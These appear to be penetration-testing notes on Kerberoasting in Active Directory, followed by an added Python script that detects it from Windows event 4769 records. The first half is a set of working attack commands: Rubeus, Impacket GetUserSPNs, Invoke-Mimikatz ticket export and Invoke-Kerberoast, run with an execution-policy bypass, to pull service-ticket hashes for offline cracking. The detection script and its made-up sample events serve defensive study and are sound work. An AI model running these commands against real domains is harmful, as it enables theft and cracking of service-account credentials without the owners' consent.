If an account has an SPN (Service Principal Name) set, we can request a service ticket (TGS) for that account and try to crack the ticket hash offline.
For Kerberos to work, the clocks of the attacker machine and the victim (DC) have to be within 5 minutes of each other.
.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap
There are many ways to enumerate SPNs and request the tickets:
setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local -dc-ip 10.10.10.21 ecorp/morph3:Password123
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
Invoke-Mimikatz -Command '"kerberos::list /export"'
This PowerShell script is always my go-to; it works well:
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerberoast.txt
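On the defender side, every one of the requests above produces a Windows Security event 4769 ("A Kerberos service ticket was requested") on the DC, and the classic tools ask for RC4-HMAC tickets (TicketEncryptionType 0x17) for many SPNs in a short burst. The script below is an added example, not part of the original notes or of any of the tools named above: it parses a constructed, flattened key=value rendering of 4769 records (the real event is XML/EVTX; the line format and all sample values here are made up) and flags both RC4 service tickets for user-account SPNs and bursts of distinct SPNs requested by one account from one IP.

```python
"""Flag possible Kerberoasting in Windows Security event 4769 records.

Added example: the key=value line format below is a constructed stand-in for
exported 4769 events; the hosts, users and services are made-up sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype requested by classic Kerberoast tooling; AES is 0x11 / 0x12

# Constructed sample records (not real DC output).
SAMPLE_4769_LINES = [
    "2024-05-01T09:00:01Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "2024-05-01T09:00:02Z EventID=4769 TargetUserName=alice@ECORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.60 Status=0x0",
    "2024-05-01T09:00:05Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "2024-05-01T09:00:06Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "2024-05-01T09:00:07Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "2024-05-01T09:00:08Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_ftp TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "2024-05-01T09:00:09Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_exch TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x0",
    # rejected request (non-zero Status), should be ignored
    "2024-05-01T09:00:10Z EventID=4769 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_unknown TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.50 Status=0x7",
    "2024-05-01T09:30:00Z EventID=4769 TargetUserName=bob@ECORP.LOCAL ServiceName=svc_legacy TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.70 Status=0x0",
    "2024-05-01T09:31:00Z EventID=4769 TargetUserName=bob@ECORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.70 Status=0x0",
]


def parse_4769(line):
    """Turn one flattened event line into a dict with typed timestamp/etype."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    ev["etype"] = int(ev["TicketEncryptionType"], 16)
    # 4769 logs IPv4 clients as IPv4-mapped IPv6; strip the prefix for readability
    ev["IpAddress"] = ev["IpAddress"].replace("::ffff:", "", 1)
    return ev


def is_user_spn(service):
    """Computer accounts end with '$' and krbtgt is the TGT service; neither is a Kerberoast target."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoast_candidates(lines, window=timedelta(seconds=60), min_services=5):
    """Return findings: RC4 tickets for user SPNs, and per-(user, ip) SPN bursts."""
    events = [parse_4769(l) for l in lines]
    # keep only successful service-ticket requests for user-account SPNs
    events = [
        e for e in events
        if e["EventID"] == "4769" and e["Status"] == "0x0" and is_user_spn(e["ServiceName"])
    ]
    findings = []

    # Rule 1: an RC4-HMAC TGS for a user-account SPN is worth an alert on its own
    for e in events:
        if e["etype"] == RC4_HMAC:
            findings.append({"rule": "rc4_tgs", "user": e["TargetUserName"],
                             "service": e["ServiceName"], "ip": e["IpAddress"],
                             "ts": e["ts"].isoformat()})

    # Rule 2: many distinct SPNs requested by one account from one IP inside `window`
    by_requester = defaultdict(list)
    for e in events:
        by_requester[(e["TargetUserName"], e["IpAddress"])].append(e)
    for (user, ip), evs in by_requester.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):  # sliding window anchored at each event
            services = {x["ServiceName"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(services) >= min_services:
                findings.append({"rule": "spn_burst", "user": user, "ip": ip,
                                 "services": sorted(services),
                                 "start": first["ts"].isoformat()})
                break  # one burst finding per requester is enough
    return findings


if __name__ == "__main__":
    for f in find_kerberoast_candidates(SAMPLE_4769_LINES):
        print(f)
```

Both rules need tuning for the environment: legitimate RC4 requests still appear where service accounts have not been moved to AES-only (`msDS-SupportedEncryptionTypes`), and monitoring or backup hosts may legitimately touch many SPNs, so a whitelist on the (user, ip) pair is the usual companion to the burst rule. The real event is read from the Security log (EVTX or a SIEM export); `parse_4769` is the only function tied to the constructed line format.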